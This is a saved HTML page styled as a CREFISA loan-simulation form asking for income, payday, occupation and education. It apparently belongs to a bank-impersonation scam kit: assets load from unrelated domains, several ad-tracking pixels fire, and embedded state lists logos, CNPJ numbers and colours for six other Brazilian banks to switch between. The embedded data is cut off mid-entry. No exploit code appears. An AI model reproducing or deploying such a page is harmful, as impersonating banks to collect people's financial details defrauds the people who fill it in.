<html data-capo="" style="--primary: #38C0E5;"><head><meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
    <title>:: CREFISA - EMPRESTIMO ::</title>
        <link rel="shortcut icon" href="images/icon.png">
<style>.header {
        background: white;
        color: white;
        padding: 15px 0;
        text-align: center;
        font-size: 1.5rem;
        font-weight: bold;
        grid-area: top-bar;
    }/*! modern-normalize v2.0.0 | MIT License | https://github.com/sindresorhus/modern-normalize */*,:after,:before{box-sizing:border-box}html{font-family:system-ui,Segoe UI,Roboto,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji;line-height:1.15;-webkit-text-size-adjust:100%;-moz-tab-size:4;-o-tab-size:4;tab-size:4}body{margin:0}hr{color:inherit;height:0}abbr[title]{-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Consolas,Liberation Mono,Menlo,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}table{border-color:inherit;text-indent:0}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}::-moz-focus-inner{border-style:none;padding:0}:-moz-focusring{outline:1px dotted ButtonText}:-moz-ui-invalid{box-shadow:none}legend{padding:0}progress{vertical-align:baseline}::-webkit-inner-spin-button,::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}summary{display:list-item}</style>
<style>blockquote,dd,dl,figure,h1,h2,h3,h4,h5,h6,hr,ol,p,pre,ul{margin:0}ol,ul{list-style:none;padding:0}img,video{height:auto;max-width:100%}*,:after,:before{border:0 solid #000}:root{--primary:transparent;--red:#ef4444;--green:#27ae60}body{background-color:#fff;color:#000;font-size:16px}#__nuxt,body,html{height:100%}a{color:#000;text-decoration:none}a:hover{cursor:pointer;text-decoration:underline}.text-red{color:var(--red)}.text-green{color:var(--green)}.text-primary{color:var(--primary)}h2{font-weight:500}</style>
<style>.default-layout[data-v-77968890]{display:grid;grid-template-areas:"top-bar" "content" "footer";grid-template-rows:auto 1fr auto;min-height:100vh}.default-layout .top-bar[data-v-77968890]{grid-area:top-bar}.default-layout .content[data-v-77968890]{background-color:#e8e6e6;grid-area:content}.default-layout .footer[data-v-77968890]{grid-area:footer}</style>
<style>.top-bar[data-v-f5d5d4cd]{background-color:white;border-bottom:1px solid hsla(0,0%,100%,.3);width:100%}.top-bar .container[data-v-f5d5d4cd]{display:grid;padding:1.5rem 0;place-content:center}</style>
<style>.container[data-v-0041013f]{box-sizing:border-box;margin:0 auto;padding-left:1rem;padding-right:1rem}@media (min-width:640px){.container[data-v-0041013f]{max-width:90%}}@media (min-width:768px){.container[data-v-0041013f]{max-width:85%}}@media (min-width:1024px){.container[data-v-0041013f]{max-width:80%}}@media (min-width:1280px){.container[data-v-0041013f]{max-width:1000px}}</style>
<style>img.logo[data-v-4f7075cc]{height:var(--2348ed9e);width:auto}h1.logo[data-v-4f7075cc]{color:#fff;text-shadow:0 1px 2px rgba(0,0,0,.2)}</style>
<style>.card[data-v-550c738e]{display:grid;gap:1.5rem}</style>
<style>.central-wrapper[data-v-4dac45b6]{margin:2.5rem 0}.container[data-v-4dac45b6]{display:grid;gap:1rem;max-width:480px;place-items:center}</style>
<style>.card[data-v-cca10726]{background-color:#fff;border-radius:10px;box-shadow:0 1px 4px 0 rgba(0,8,38,.04);padding:1.5rem;width:100%}</style>
<style>.card-title[data-v-303a1430]{color:#000;font-size:1.35rem;font-weight:500}</style>
<style>.credentials-form[data-v-28e16794]{display:grid;gap:.75rem}</style>
<style>label[data-v-1258047d]{color:#858a98;font-size:13px;padding-left:12px}.currency-field[data-v-1258047d]{position:relative}.currency-field input[data-v-1258047d]{border:1px solid #d4dae0;border-radius:1rem;outline:none;padding:1rem 1rem 1rem 4rem;width:100%}.currency-field .brl[data-v-1258047d]{border:1px solid #d4dae0;border-radius:10px;color:var(--primary);font-weight:600;left:12px;padding:.2rem .5rem;position:absolute;top:50%;transform:translateY(-50%)}</style>
<style>.text-field[data-v-f786dc3c]{display:grid;gap:.5rem;text-align:left}.text-field input[data-v-f786dc3c]{border:1px solid #d4dae0;border-radius:1rem;outline:none;padding:1rem;width:100%}.text-field input[data-v-f786dc3c]:disabled{background-color:#f2f2f2;cursor:not-allowed}.text-field input[data-v-f786dc3c]::-moz-placeholder{color:#d2d2d2}.text-field input[data-v-f786dc3c]::placeholder{color:#d2d2d2}.text-field label[data-v-f786dc3c]{color:#858a98;font-size:13px;padding-left:12px}</style>
<style>.select-field[data-v-326ebfd1]{display:grid;gap:.5rem;width:100%}.select-field select[data-v-326ebfd1]{border:1px solid #d4dae0;border-radius:1rem;outline:none;padding:1rem;width:100%}.select-field label[data-v-326ebfd1]{color:#858a98;font-size:13px;padding-left:12px}</style>
<style>.button[data-v-d342e251]{border-radius:1rem;cursor:pointer;font-weight:500;letter-spacing:.3px;padding:.75rem 3rem;transition:opacity .1s;width:-moz-max-content;width:max-content}.button.light[data-v-d342e251]{background:#fff;color:var(--primary)}.button.primary[data-v-d342e251]{background:var(--primary);color:#fff}.button[data-v-d342e251]:hover{opacity:.9}.button[data-v-d342e251]:disabled{cursor:not-allowed;opacity:.5}</style>
<style>.footer[data-v-63f14862]{border-bottom:7px solid var(--primary);border-top:2px solid #000;color:#fff;color:#000;padding:2rem 0;text-align:center}.footer p[data-v-63f14862]{margin:.5rem 0}</style>
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/TopBar.2vF9lWx7.css">
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/Container.B5PP9_Vn.css">
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/CardTitle.D2C4NpE7.css">
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/convertBRLToNumber.CbklMpCZ.css">
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/TextField.CxwDXpLp.css">
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/SelectField.mg1uS0U8.css">
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/Button.CTY08tZL.css">
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/LoadingText.BAPOmI7q.css">
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/ErrorText.Bv2b0-D6.css">
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/Card.GBBMdh4F.css">
<link rel="stylesheet" href="https://suporte-org.online/_nuxt/CentralWrapper.Jxhi_ayc.css">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/Ds3y3Bf3.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/k9y74een.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/Bo8ipC1T.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/2aeojNjQ.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/Ca5fW8Kt.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/DTnGPJep.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/B39tkm2Q.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/CZUmzILz.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/Thk4Js-G.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/Bl1c_aD8.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/DEF4dnCe.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/CNxTVsKb.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/C2HPSeZs.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/MaghENf1.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/BJRZzHYv.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/CV182wBC.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/u-U6PqlP.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/DGc1ZeLM.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/sv4npInL.js">
<link rel="modulepreload" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/BxXuEPsU.js">
<link rel="prefetch" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/J9e3dA3M.js">
<link rel="prefetch" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/D-UNq_Tu.js">
<link rel="prefetch" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/BGBp0rdz.js">
<link rel="prefetch" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/Wpn3EkJ-.js">
<link rel="prefetch" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/CKC6fHHG.js">
<link rel="prefetch" as="script" crossorigin="" href="https://suporte-org.online/_nuxt/BhOEMyyX.js">
<script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_2.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script async="" src="https://connect.facebook.net/en_US/fbevents.js"></script><script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_2.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script async="" src="js/fbevents.js"></script><script src="https://connect.facebook.net/signals/config/1763225554485563?v=2.9.167&amp;r=stable&amp;domain=unipay-br.org&amp;hme=da9a399065fb1c492026018b9e54864148adfb49d800f41752428fb7b59190f8&amp;ex_m=69%2C118%2C104%2C108%2C60%2C4%2C97%2C68%2C16%2C94%2C86%2C50%2C53%2C168%2C171%2C183%2C179%2C180%2C182%2C29%2C98%2C52%2C75%2C181%2C163%2C166%2C176%2C177%2C184%2C127%2C40%2C34%2C139%2C15%2C49%2C190%2C189%2C129%2C18%2C39%2C1%2C42%2C64%2C65%2C66%2C70%2C90%2C17%2C14%2C93%2C89%2C88%2C105%2C51%2C107%2C38%2C106%2C30%2C91%2C26%2C164%2C167%2C136%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C56%2C61%2C63%2C73%2C99%2C27%2C74%2C9%2C8%2C78%2C47%2C21%2C101%2C100%2C102%2C95%2C10%2C20%2C3%2C19%2C83%2C55%2C81%2C33%2C72%2C0%2C92%2C32%2C80%2C85%2C46%2C45%2C84%2C37%2C5%2C87%2C79%2C43%2C35%2C82%2C2%2C36%2C62%2C41%2C103%2C44%2C77%2C67%2C109%2C59%2C58%2C31%2C96%2C57%2C54%2C48%2C76%2C71%2C24%2C110%2C196%2C195%2C197%2C202%2C203%2C204%2C200%2C192%2C128%2C159%2C191%2C193%2C119%2C153%2C141%2C147%2C185%2C186%2C125%2C228%2C113%2C124%2C229%2C161%2C116%2C231%2C162%2C132%2C120%2C150%2C144" async=""></script><script src="https://connect.facebook.net/signals/config/485377260925980?v=2.9.167&amp;r=stable&amp;domain=unipay-br.org&amp;hme=da9a399065fb1c492026018b9e54864148adfb49d800f41752428fb7b59190f8&amp;ex_m=69%2C118%2C104%2C108%2C60%2C4%2C97%2C68%2C16%2C94%2C86%2C50%2C53%2C168%2C171%2C183%2C179%2C180%2C182%2C29%2C98%2C52%2C75%2C181%2C163%2C166%2C176%2C177%2C184%2C127%2C40%2C34%2C139%2C15%2C49%2C190%2C189%2C129%2C18%2C39%2C1%2C42%2C64%2C65%2C66%2C70%2C90%2C17%2C14%2C93%2C89%2C88%2C105%2C51%2C107%2C38%2C106%2C30%2C91%2C26%2C164%2C167%2C136%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C56%2C61%2C63%2C73%2C99%2C27%2C74%2C9%2C8%2C78%2C47%2C21%2C101%2C100%2C102%2C95%2C10%2C20%2C3%2C19%2C83%2C55%2C81%2C33%2C72%2C0%2C92%2C32%2C80%2C85%2C46%2C45%2C84%2C37%2C5%2C87%2C79%2C43%2C35%2C82%2C2%2C36%2C62%2C41%2C103%2C44%2C77%2C67%2C109%2C59%2C58%2C31%2C96%2C57%2C54%2C48%2C76%2C71%2C24%2C110%2C196%2C195%2C197%2C202%2C203%2C204%2C200%2C192%2C128%2C159%2C191%2C193%2C119%2C153%2C141%2C147%2C185%2C186%2C125%2C228%2C113%2C124%2C229%2C161%2C116%2C231%2C162%2C132%2C120%2C150%2C144" async=""></script><script src="https://connect.facebook.net/signals/config/378830935268765?v=2.9.167&amp;r=stable&amp;domain=unipay-br.org&amp;hme=da9a399065fb1c492026018b9e54864148adfb49d800f41752428fb7b59190f8&amp;ex_m=69%2C118%2C104%2C108%2C60%2C4%2C97%2C68%2C16%2C94%2C86%2C50%2C53%2C168%2C171%2C183%2C179%2C180%2C182%2C29%2C98%2C52%2C75%2C181%2C163%2C166%2C176%2C177%2C184%2C127%2C40%2C34%2C139%2C15%2C49%2C190%2C189%2C129%2C18%2C39%2C1%2C42%2C64%2C65%2C66%2C70%2C90%2C17%2C14%2C93%2C89%2C88%2C105%2C51%2C107%2C38%2C106%2C30%2C91%2C26%2C164%2C167%2C136%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C56%2C61%2C63%2C73%2C99%2C27%2C74%2C9%2C8%2C78%2C47%2C21%2C101%2C100%2C102%2C95%2C10%2C20%2C3%2C19%2C83%2C55%2C81%2C33%2C72%2C0%2C92%2C32%2C80%2C85%2C46%2C45%2C84%2C37%2C5%2C87%2C79%2C43%2C35%2C82%2C2%2C36%2C62%2C41%2C103%2C44%2C77%2C67%2C109%2C59%2C58%2C31%2C96%2C57%2C54%2C48%2C76%2C71%2C24%2C110%2C196%2C195%2C197%2C202%2C203%2C204%2C200%2C192%2C128%2C159%2C191%2C193%2C119%2C153%2C141%2C147%2C185%2C186%2C125%2C228%2C113%2C124%2C229%2C161%2C116%2C231%2C162%2C132%2C120%2C150%2C144" async=""></script><script src="https://connect.facebook.net/signals/config/1241138923470476?v=2.9.167&amp;r=stable&amp;domain=unipay-br.org&amp;hme=da9a399065fb1c492026018b9e54864148adfb49d800f41752428fb7b59190f8&amp;ex_m=69%2C118%2C104%2C108%2C60%2C4%2C97%2C68%2C16%2C94%2C86%2C50%2C53%2C168%2C171%2C183%2C179%2C180%2C182%2C29%2C98%2C52%2C75%2C181%2C163%2C166%2C176%2C177%2C184%2C127%2C40%2C34%2C139%2C15%2C49%2C190%2C189%2C129%2C18%2C39%2C1%2C42%2C64%2C65%2C66%2C70%2C90%2C17%2C14%2C93%2C89%2C88%2C105%2C51%2C107%2C38%2C106%2C30%2C91%2C26%2C164%2C167%2C136%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C56%2C61%2C63%2C73%2C99%2C27%2C74%2C9%2C8%2C78%2C47%2C21%2C101%2C100%2C102%2C95%2C10%2C20%2C3%2C19%2C83%2C55%2C81%2C33%2C72%2C0%2C92%2C32%2C80%2C85%2C46%2C45%2C84%2C37%2C5%2C87%2C79%2C43%2C35%2C82%2C2%2C36%2C62%2C41%2C103%2C44%2C77%2C67%2C109%2C59%2C58%2C31%2C96%2C57%2C54%2C48%2C76%2C71%2C24%2C110" async=""></script><script async="" src="js/fbevents.js"></script><script type="module" src="https://suporte-org.online/_nuxt/Ds3y3Bf3.js" crossorigin=""></script>
<script id="unhead:payload" type="application/json">{"title":"Empréstimo facilitado, simulação gratuita!"}</script><link rel="stylesheet" href="https://unipay-br.org/_nuxt/5-loan-info.BS-KS5dJ.css"><link rel="stylesheet" href="https://unipay-br.org/_nuxt/default.fxhPcPvK.css">    <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1044109920185725');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=1044109920185725&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->

<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1416081155754349');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=1416081155754349&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->

<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '478917228479685');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=478917228479685&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->

<!-- TikTok Pixel Code Start -->
<script>
!function (w, d, t) {
  w.TiktokAnalyticsObject=t;var ttq=w[t]=w[t]||[];ttq.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie","holdConsent","revokeConsent","grantConsent"],ttq.setAndDefer=function(t,e){t[e]=function(){t.push([e].concat(Array.prototype.slice.call(arguments,0)))}};for(var i=0;i<ttq.methods.length;i++)ttq.setAndDefer(ttq,ttq.methods[i]);ttq.instance=function(t){for(
var e=ttq._i[t]||[],n=0;n<ttq.methods.length;n++)ttq.setAndDefer(e,ttq.methods[n]);return e},ttq.load=function(e,n){var r="https://analytics.tiktok.com/i18n/pixel/events.js",o=n&&n.partner;ttq._i=ttq._i||{},ttq._i[e]=[],ttq._i[e]._u=r,ttq._t=ttq._t||{},ttq._t[e]=+new Date,ttq._o=ttq._o||{},ttq._o[e]=n||{};n=document.createElement("script")
;n.type="text/javascript",n.async=!0,n.src=r+"?sdkid="+e+"&lib="+t;e=document.getElementsByTagName("script")[0];e.parentNode.insertBefore(n,e)};


  ttq.load('CR88BSBC77U42T4DV7H0');
  ttq.page();
}(window, document, 'ttq');
</script>
<!-- TikTok Pixel Code End -->

<script>
!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.install=t():e.install=t()}(window,(function(){return function(e){var t={};function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{}};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e,n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject=n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t]=function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r];var i=o([t],n,!0);e.push(i)}};i.methods.forEach((function(e){a(i,e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n,e)})),n},i.load=function(e,o){var a="https://s1.kwai.net/kos/s101/nlav11187/pixel/events.js";i._i=i._i||{},i._i[e]=[],i._i[e]._u=a,i._t=i._t||{},i._t[e]=+new Date,i._o=i._o||{},i._o[e]=o||{};var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"https://s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js"+c)}}(window,document,"kwaiq")}])}));
</script>
<script>
kwaiq.load('510449167530721283');
kwaiq.page();
</script></head><body><div id="__nuxt"><div class="default-layout" data-v-77968890=""><header class="top-bar" data-v-77968890="" data-v-f5d5d4cd=""><div class="container" data-v-f5d5d4cd="" data-v-0041013f=""><!--[--> <div class="header">
          <img decoding="async" style="width: 120px;" src="images/Crefisa.png" alt="Imagem Centralizada">
      </div><!--]--></div></header><main class="content" data-v-77968890=""><!--[--><div class="central-wrapper loan-info-page" data-v-550c738e="" data-v-4dac45b6=""><div class="container" data-v-4dac45b6="" data-v-0041013f=""><!--[--><!--[--><div class="card" data-v-550c738e="" data-v-cca10726=""><!--[--><span class="card-title" data-v-550c738e="" data-v-303a1430=""><!--[-->Quase lá<!--]--></span><form class="credentials-form" data-v-550c738e="" data-v-28e16794="" action="../Valor-do-Emprestimo/index.html"><!--[--><label for="" data-v-1258047d="">Qual sua renda mensal?</label><div class="currency-field" data-v-1258047d=""><input type="text" id="currency" value="0,00" required="" data-v-1258047d=""><span class="brl" data-v-1258047d="">R$</span></div><!--]--><div class="text-field" data-v-28e16794="" data-v-f786dc3c=""><label data-v-f786dc3c="">Qual dia do mês você recebe?</label><input type="text" value="0" required="" placeholder="0 a 30" data-v-f786dc3c="" id="3965773e-63dd-66b6-9049-7dd79291896e"></div><div class="select-field" modelvalue="" data-v-28e16794="" data-v-326ebfd1=""><label data-v-326ebfd1="">Ocupação</label><select required="" data-v-326ebfd1=""><!--[--><option value="" selected="" disabled="" data-v-28e16794="">Selecione</option><!--[--><option value="Empresário" data-v-28e16794="">Empresário</option><option value="Dona de casa" data-v-28e16794="">Dona de casa</option><option value="Empregado CLT" data-v-28e16794="">Empregado CLT</option><option value="Autônomo" data-v-28e16794="">Autônomo</option><option value="Funcionário público" data-v-28e16794="">Funcionário público</option><option value="Rentista" data-v-28e16794="">Rentista</option><option value="Aposentado/Pensionista" data-v-28e16794="">Aposentado/Pensionista</option><option value="Estudante" data-v-28e16794="">Estudante</option><option value="Desempregado" data-v-28e16794="">Desempregado</option><option value="Outro" data-v-28e16794="">Outro</option><!--]--><!--]--></select></div><div class="select-field" modelvalue="" data-v-28e16794="" data-v-326ebfd1=""><label data-v-326ebfd1="">Escolaridade</label><select required="" data-v-326ebfd1=""><!--[--><option value="" selected="" disabled="" data-v-28e16794="">Selecione</option><!--[--><option value="Fundamental" data-v-28e16794="">Fundamental</option><option value="Médio" data-v-28e16794="">Médio</option><option value="Superior" data-v-28e16794="">Superior</option><option value="Pós-Graduação" data-v-28e16794="">Pós-Graduação</option><option value="Outro" data-v-28e16794="">Outro</option><!--]--><!--]--></select></div><button class="button primary" type="submit" data-v-28e16794="" data-v-d342e251="" id="d899a755-dd81-c408-cf6d-fbc26df7faac"><!--[-->Continuar<!--]--></button><!----><!----><input type="hidden" name="utm_source" value="organicjLj66d8bb38117d604b770459f3" id="055e8139-dbb5-0eb4-f646-33222f8fca7d"><input type="hidden" name="utm_campaign" value="rKm-km-rKm" id="f5c5ec35-e2d7-3911-f5e1-2f3c8869603a"><input type="hidden" name="utm_medium" value="" id="48bbfaf0-23b8-3729-65e9-01b582d21a78"><input type="hidden" name="utm_content" value="" id="1165fc07-2d66-2b40-5719-3f132a0265c0"><input type="hidden" name="utm_term" value="" id="f3a419a7-26b9-3bd3-5fb9-b2cd74d7724f"><input type="hidden" name="subid" value="organicjLj66d8bb38117d604b770459f3" id="cbc544e0-6017-d851-3cb4-de38d876ec1a"><input type="hidden" name="sid2" value="rKm-km-rKm" id="ba1c8fd6-c68c-ecd5-4e3c-338f4a10c807"><input type="hidden" name="subid2" value="rKm-km-rKm" id="a29e075f-1b62-2be9-64ba-0fc9023c5194"><input type="hidden" name="subid3" value="" id="44a0af8b-59a3-3522-9ff3-f39bfa361b4b"><input type="hidden" name="subid4" value="" id="2d2c69a1-2c17-65c8-1f59-e412581bb839"><input type="hidden" name="subid5" value="rKm-km-rKm" id="92b3a7b9-d632-14d1-8a7c-91e4fae9edba"><input type="hidden" name="xcod" value="organicjLj66d8bb38117d604b770459f3hQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR" id="cd1a0b62-ad26-20ad-2631-fa0b02b407bd"><input type="hidden" name="sck" value="organicjLj66d8bb38117d604b770459f3hQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR" id="d19db013-27dc-c693-5de5-4861a7f75c2f"></form><!--]--></div><!--]--><!--]--></div></div><!--]--></main><footer class="footer" data-v-77968890="" data-v-63f14862=""><div class="container" data-v-63f14862="" data-v-0041013f=""><!--[--><p data-v-63f14862="">© 2024 CREFISA S.A. CNPJ: 60.779.196/0001-96</p><p data-v-63f14862="">Avenida Presidente Wilson, 9, São Vicente/SP - CEP 11320-905</p><!--]--></div></footer></div></div><div id="teleports"></div><script type="application/json" id="__NUXT_DATA__" data-ssr="true">[["ShallowReactive",1],{"data":2,"state":4,"once":7,"_errors":8,"serverRendered":10,"path":11,"pinia":12},["ShallowReactive",3],{},["Reactive",5],{"$s$9iFiNTOFdH":6},"0,00",["Set"],["ShallowReactive",9],{},true,"/uni/5-loan-info?utm_source=organic&utm_campaign=rKm-km-rKm&utm_medium=&utm_content=&utm_term=&subid=&sid2=rKm-km-rKm&subid2=rKm-km-rKm&subid3=&subid4=&subid5=rKm-km-rKm&xcod=hQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR&sck=hQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR",["Reactive",13],{"brand":14,"user":71,"card-user":80},{"brandSlug":15,"brands":16},"uni",[17,26,35,44,53,62],{"slug":18,"name":19,"logo":20,"cnpj":23,"address":24,"color":25},"bb","Banco do Brasil",{"normal":21,"light":22},"/brands/bb.svg","/brands/light/bb.svg","00.000.000/0001-91","Asa Norte, S/Nº, Brasília/DF - CEP 70040-911","#e1ae2f",{"slug":27,"name":28,"logo":29,"cnpj":32,"address":33,"color":34},"bc","Bradesco",{"normal":30,"light":31},"/brands/bradesco.svg","/brands/light/bradesco.svg","60.746.948.0001-12","Cidade De Deus, S/Nº, Osasco/SP - CEP 06029-900","#E1173F",{"slug":36,"name":37,"logo":38,"cnpj":41,"address":42,"color":43},"it","Itaú",{"normal":39,"light":40},"/brands/itau.svg","/brands/light/itau.svg","60.872.504/0001-23","Praça Alfredo Egydio de Souza Aranha, 100,  Parque Jabaquara/SP - CEP 04344-902","#FF6200",{"slug":45,"name":46,"logo":47,"cnpj":50,"address":51,"color":52},"std","Santander",{"normal":48,"light":49},"/brands/santander.svg","/brands/light/santander.svg","90.400.888/0001-42","Av. Presidente Juscelino Kubitscheck, 2041/2235, São Paulo/SP - CEP 13571-410","#cc0000",{"slug":54,"name":55,"logo":56,"cnpj":59,"address":60,"color":61},"cef","Caixa",{"normal":57,"light":58},"/brands/caixa.svg","/brands/light/caixa.svg","00.360.305/0001-04","Asa Sul, S/Nº, Brasília/DF - CEP 70070-140","#0066b3",{"slug":63,"name":64,"logo":65,"cnpj":68,"address":69,"color":70},"pag","PagBank",{"normal":66,"light":67},"/brands/pagbank.svg","/brands/light/pagbank.svg","08.561.701/0001-01","Av. Brigadeiro Faria Lima, 1.384, São Paulo/SP - CEP 